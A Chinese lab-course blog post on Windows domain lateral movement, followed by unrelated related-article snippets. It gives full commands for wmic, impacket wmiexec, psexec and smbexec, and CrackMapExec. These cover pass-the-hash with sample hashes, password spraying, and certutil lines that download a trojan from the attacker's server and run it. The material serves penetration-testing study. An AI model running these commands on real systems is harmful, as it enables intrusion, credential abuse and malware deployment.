第129天:内网安全-横向移动WmiSmbCrackMapExecProxyChainsImpacket
这里这个环境继续上一篇文章搭建的环境
案例一: 域横向移动-WMI-自带&命令&套件&插件
首先上线win2008
首先提权到system权限
wmic是windows自带的命令,可以通过135端口进行连接利用,只支持明文方式,优点是不用上传别的东西,缺点是无回显。
利用system权限抓取明文密码和hash密码
直接获得了域控管理员的账号密码
探测存活主机
进一步的信息收集上一篇文章写过
win2008开启监听并生成木马上传到本地web服务器
wmic
利用wmic命令去连接别的主机,让目标主机去下载木马
wmic /node:目标ip /user:账号 /password:密码 process call create "执行命令"
wmic /node:192.168.3.30 /user:administrator /password:admin@123 process call create "certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe"
连接成功一般只有这种显示
成功上传
让他执行
成功上线
缺点就是没有任何回显
cscript
项目地址:https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs
特点是会反弹一个新的窗口就导致没有办法在cs当中去运行,类似反弹shell,并且得借助一个vbs文件,且不支持hash
在3.20(win2008主机)上运行
cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com
弹过来的新窗口反弹的ip为3.30
wmiexec-impacket
下载地址
1、Py版:https://github.com/SecureAuthCorp/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 “ver”
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”2、Exe版:https://gitee.com/RichChigga/impacket-examples-windows
这种方式又拥有回显,又可以适配cs
生成代理节点
这里因为我是linux环境直接执行py文件,exe文件一个原理
wmiexec ./账号:密码@ip "命令"
wmiexec 域名/账号:密码@ip "命令"
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
尝试使用域控的hash进行连接
wmiexec -hashes :hash值 (域名或者.)/账号@192.168.3.40 "whoami"
执行上线
proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator@192.168.3.40 "certutil -urlcache -split -f h c:/222.exe & c:/222.exe"
案例二: 域横向移动-SMB-自带&命令&套件&插件
利用的是smb开放的445端口
命令
项目地址:PsTools - Sysinternals | Microsoft Learn
psexe也是反弹一个cmd所以不能直接在cs当中运行
windows官方用法
psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd
这里因为我是linux系统所以我直接把文件拖入win2008进行运行,并且运行该文件的时候cmd权限必须为admin,这里也可以用socks代理执行,并且权限已经是system可以执行。
20执行获得30的cmd
套件
使用套件中的psexec
wmi套件中
psexec.py ./administrator:123.com@192.168.3.30
psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.30
套件当中还有一个smbexec.py文件
python smbexec.py ./administrator:123.com@192.168.3.40
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30
同样也是会弹出一个新的cmd会话
cs自带
先需要设置转发上线,因为内网不出网
选择域控密码,或者主机密码
域控上线
利用psexec64+主机hash值上线win7
因为这里我所有主机都是一个密码,所以直接选这个,记得他会自动加上win2008的域,记得删除,然后就是提醒我们在内网渗透过程当中要尝试切换域内用户的登录方式,大部分会自动加上域
成功上线
案例三: 域横向移动-工具-Proxychains&CrackMapExec
这里proxychains我一直在用,不做过多介绍了
crackmapexec下载地址:(kali自带)GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks
基本用法
探测存活主机
crackmapexec smb 192.168.3.10-40 #探测存活主机
密码喷射域登录
crackmapexec smb 192.168.3.10-40 -u jie -p 123.com
这里由于我没有把密码和主机进行绑定,所以域内所有主机都可以用这个密码登录
密码喷射本地登录
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth
密码喷射本地登录加执行命令
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x "whoami"
尝试上线,记得设置转发上线,ip需要设置为内网ip
利用下面的命令下载web服务器中的木马,并尝试运行上线
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x "certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe & c:/zzzzz.exe"
除了域控主机之外都上线了,切换域控密码喷射
高阶玩法
当收集到一台域内主机以后,可以尝试把收集到的密码,用户都写入字典当中
注意收集用户的时候不能用提权的账户,需要用域内账户
这里密码我基本上都是123.com
运行,这里注意要加一个参数,不然运行一个成功匹配后就不会继续往下运行
--continue-on-success用字典密码去匹配
这个加continue参数好像只能够匹配密码,不能全上线,不加参数的话又指挥上线一个就掉了,不太懂了,可以匹配出来密码,用账号密码,一个一个去上线?
相关文章:
第129天:内网安全-横向移动WmiSmbCrackMapExecProxyChainsImpacket
这里这个环境继续上一篇文章搭建的环境 案例一: 域横向移动-WMI-自带&命令&套件&插件 首先上线win2008 首先提权到system权限 wmic是windows自带的命令,可以通过135端口进行连接利用,只支持明文方式,优点是不用上传别…...
ChatGPT教我将MySQL中where find_in_set改成PostgreSQL支持的写法
问题 之前使用Mybatis,在MySQL中使用如下SQL语句没有问题: SELECT * FROM dept WHERE find_in_set(5,dept_parent);现在切换到PostgreSQL,发现find_in_set函数不能使用。 解决 SELECT * FROM dept WHERE 5 ANY(string_to_array(dept_parent, ,));总…...
Python命令模式:掌控你的代码指令
Python命令模式:掌控你的代码指令 在软件工程的浩瀚海洋中,命令模式(Command Pattern)是一盏指引航向的明灯,它将请求或操作封装成对象,从而让代码更加灵活、可扩展。本文将深入探讨Python中的命令模式&am…...
电子产品 IPX7 防水级别测试的具体流程)
【物联网】(防水篇)电子产品 IPX7 防水级别测试的具体流程
电子产品 IPX7 防水级别测试的具体流程 1. 准备工作: - 准备一个足够大的浸水箱,确保水深至少为 1 米,以满足 IPX7 测试的标准要求。 - 将水温控制在标准温度范围内,通常在 15-35 摄氏度之间,以模拟正常使用环境。 2…...
Redis 实现消息队列
Redis 实现消息队列 文章目录 Redis 实现消息队列导引1. 基于List结构的消息队列2. 基于PubSub的消息队列3. 基于Stream的消息队列(推荐)3.1 XADD3.2 XREAD3.3 XGROUP 导引 消息队列(Message Queue),从概念上来理解就是用来存放消息的队列,最简单的消息…...
模板初阶(详解)
一、泛型编程 为了引出模板,我们来看下面代码,比如要实现不同类型的交换函数,如下: void Swap(int& a, int& b) {int c a;a b;b c; } void Swap(char& a, char& b) {char c a;a b;b c; } void Swap(doubl…...
对称加密算法解析:DES、AES及其在`pycryptodome` 和 `crypto-js` 模块中的应用
📚 对称加密算法解析:DES、AES及其在pycryptodome 和 crypto-js 模块中的应用 🗝️ DES 算法 算法原理 数据加密标准(DES)是一种对称密钥加密算法,用于保护数据的安全。DES 使用一个 56 位的密钥进行加密…...
C++设计模式(代理模式)
1. 电话虫 在海贼中,有一种神奇的通信工具叫做电话虫(Den Den Mushi),外形如蜗牛,身上带有斑点或条纹或通体纯色,壳顶上有对讲机或按键,不接通时会睡觉,接通时会惊醒,并发…...
Linux系统驱动(十三)Linux内核定时器
文章目录 一、内核定时器原理二、定时器API三、使用定时器让LED灯闪烁四、使用定时器对按键进行消抖 一、内核定时器原理 内核当前时间通过jiffies获取,它是内核时钟节拍数,在linux内核启动的时候,jiffies开始(按照一定频率&…...
Visual Studio 调试时加载符号慢
什么是调试符号 编译程序时生成的一组特殊字符,并包含有关变量和函数在生成的二进制文件中的位置以及其他服务信息的信息。 该数据集可用于逐步调试程序或检查第三方代码。 调试符号可以添加到可执行文件或库中,但是大多数现代编译器将它们存储为单独的…...
Spring Cloud Config:动态配置的魔法师
Spring Cloud Config:动态配置的魔法师 在微服务架构的浩瀚星海中,配置管理如同一颗璀璨的星辰,而Spring Cloud Config则是那颗能够实现配置信息集中管理和动态刷新的魔法星。本文将深入探索Spring Cloud Config的奥秘,揭示如何通…...
Webpack入门基础知识及案例
webpack相信大家都已经不陌生了,应用程序的静态模块打包工具。前面我们总结了vue,react入门基础知识,也分别做了vue3的实战小案例,react的实战案例,那么我们如何使用webpack对项目进行模块化打包呢? 话不多…...
对中国人工智能与国外人工智能的思考
作为一名语文老师,我在教育的领域中见证着时代的变迁,也关注着科技的发展,尤其是人工智能这一前沿领域。当我们将目光投向中国人工智能与国外人工智能的发展时,心中不禁涌起诸多思考。 中国的人工智能近年来犹如一颗璀璨的新星&am…...
【debian系统arm架构安装docker】且换源后依旧不行就离线导入镜像
安装docker 在Debian系统上安装Docker并使用阿里云的镜像源可以通过以下步骤完成 1.更新软件包索引 前置如果需要更换源的请移步 : 初始化配置(自动连wifi,自动开启SSH)换清华源,远程桌面连接 sudo apt-get update2.安装必要的软件包以允许apt通过HTTPS使用仓库 sudo apt-get …...
Readwise 官方 Obsidian 插件使用
Readwise 官方 Obsidian 插件简介 Obsidian 中的 Readwise 注释示例 阅读已经发布了官方插件来导入你的 Readwise 数据Obsidian 。如果你还没有使用过 Readwise,那么值得一看。Readwise 是我最喜欢的 应用之一。我每天都在用它。因此,将这些数据自动导…...
A. A+B Again?
time limit per test 1 second memory limit per test 256 megabytes Given a two-digit positive integer nn, find the sum of its digits. Input The first line contains an integer tt (1≤t≤901≤t≤90) — the number of test cases. The only line of each tes…...
pr样机模板视频素材|城市户外高速路广告牌视频样机
https://prmuban.com/40369.html pr样机素材,全高清实景城市户外高速路广告牌视频样机模板,适合宣传视频制作。 主要特点: Adobe Premiere Pro 2024 全高清分辨率(19201080) 易于使用 快速渲染 无需插件 预览中使用的…...
谷歌大中华区总裁:所有企业都在问这个问题
中国开发者对于出海的热情,令Google大中华区总裁陈俊廷感慨。2024 Google I/O Connect(2024Google开发者大会)期间,他在接受第一财经记者独家采访时提到一个细节:早上7:30,他来到会场时,人们已经…...
GPT-4o:AI视觉识别的革命性飞跃
在AI的宏伟叙事中,图像识别技术始终扮演着关键角色。随着技术的不断演进,AI的视界已超越了简单的图像内容识别,它现在能够将视觉信息转化为引人入胜的文字描述。OpenAI最新力作——GPT-4o模型,以其卓越的多模态理解能力࿰…...
将电脑打造成私人网盘,支持外网访问之详细操作教程
你想过把自己电脑打造成随时随地访问的网盘吗?就是那种拥有一个属于自己的影音库,不用担心被和谐,随时可以登录访问电脑上的各种文件,相比传统网盘省心又安全。 使用Everything和节点小宝将电脑搭建成私人网盘,可以实现…...
Docker 离线安装指南
参考文章 1、确认操作系统类型及内核版本 Docker依赖于Linux内核的一些特性,不同版本的Docker对内核版本有不同要求。例如,Docker 17.06及之后的版本通常需要Linux内核3.10及以上版本,Docker17.09及更高版本对应Linux内核4.9.x及更高版本。…...
)
椭圆曲线密码学(ECC)
一、ECC算法概述 椭圆曲线密码学(Elliptic Curve Cryptography)是基于椭圆曲线数学理论的公钥密码系统,由Neal Koblitz和Victor Miller在1985年独立提出。相比RSA,ECC在相同安全强度下密钥更短(256位ECC ≈ 3072位RSA…...
(十)学生端搭建
本次旨在将之前的已完成的部分功能进行拼装到学生端,同时完善学生端的构建。本次工作主要包括: 1.学生端整体界面布局 2.模拟考场与部分个人画像流程的串联 3.整体学生端逻辑 一、学生端 在主界面可以选择自己的用户角色 选择学生则进入学生登录界面…...
FastAPI 教程:从入门到实践
FastAPI 是一个现代、快速(高性能)的 Web 框架,用于构建 API,支持 Python 3.6。它基于标准 Python 类型提示,易于学习且功能强大。以下是一个完整的 FastAPI 入门教程,涵盖从环境搭建到创建并运行一个简单的…...
TRS收益互换:跨境资本流动的金融创新工具与系统化解决方案
一、TRS收益互换的本质与业务逻辑 (一)概念解析 TRS(Total Return Swap)收益互换是一种金融衍生工具,指交易双方约定在未来一定期限内,基于特定资产或指数的表现进行现金流交换的协议。其核心特征包括&am…...
ardupilot 开发环境eclipse 中import 缺少C++
目录 文章目录 目录摘要1.修复过程摘要 本节主要解决ardupilot 开发环境eclipse 中import 缺少C++,无法导入ardupilot代码,会引起查看不方便的问题。如下图所示 1.修复过程 0.安装ubuntu 软件中自带的eclipse 1.打开eclipse—Help—install new software 2.在 Work with中…...
JDK 17 新特性
#JDK 17 新特性 /**************** 文本块 *****************/ python/scala中早就支持,不稀奇 String json “”" { “name”: “Java”, “version”: 17 } “”"; /**************** Switch 语句 -> 表达式 *****************/ 挺好的ÿ…...
CRMEB 框架中 PHP 上传扩展开发:涵盖本地上传及阿里云 OSS、腾讯云 COS、七牛云
目前已有本地上传、阿里云OSS上传、腾讯云COS上传、七牛云上传扩展 扩展入口文件 文件目录 crmeb\services\upload\Upload.php namespace crmeb\services\upload;use crmeb\basic\BaseManager; use think\facade\Config;/*** Class Upload* package crmeb\services\upload* …...
SpringCloudGateway 自定义局部过滤器
场景: 将所有请求转化为同一路径请求(方便穿网配置)在请求头内标识原来路径,然后在将请求分发给不同服务 AllToOneGatewayFilterFactory import lombok.Getter; import lombok.Setter; import lombok.extern.slf4j.Slf4j; impor…...
实现弹窗随键盘上移居中
实现弹窗随键盘上移的核心思路 在Android中,可以通过监听键盘的显示和隐藏事件,动态调整弹窗的位置。关键点在于获取键盘高度,并计算剩余屏幕空间以重新定位弹窗。 // 在Activity或Fragment中设置键盘监听 val rootView findViewById<V…...